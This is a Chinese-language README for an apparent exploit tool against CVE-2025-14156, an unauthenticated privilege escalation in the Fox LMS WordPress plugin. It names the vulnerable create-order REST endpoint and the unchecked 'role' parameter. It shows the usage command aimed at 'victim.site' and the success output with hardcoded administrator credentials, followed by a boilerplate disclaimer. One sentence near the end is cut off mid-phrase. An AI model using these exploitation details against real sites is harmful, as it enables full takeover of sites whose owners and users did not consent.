Fox LMS – WordPress LMS 插件 1.0.4.7 - 1.0.5.1 – 通过 'createOrder' 实现未认证权限提升
Fox LMS – WordPress LMS 插件(v1.0.4.7 至 v1.0.5.1)– 通过 createOrder 实现未认证权限提升
所有版本直到并包括 1.0.5.1 的 Fox LMS for WordPress 都存在权限提升漏洞。/fox-lms/v1/payments/create-order REST API 端点在创建新用户时未正确验证 'role' 参数,允许未认证攻击者创建具有任意角色(包括管理员)的账户。
CVE: CVE-2025-14156
CVSS 分数: 9.8(严重)
风险: 网站完全沦陷。
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
成功利用后,脚本将仅输出:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
如果利用失败,将只显示简短的错误信息。
'administrator' 角色。此工具仅用于教育和授权测试目的。未获明确许可对任何系统进行未授权使用均属违法。作者不对因使用本脚本导致的误用、损害或法律后果负责。请始终遵循负责任披露原则,并在测试任何目标前确保获得书面授权。
Telegram: @Nxploited
Github: Nxploited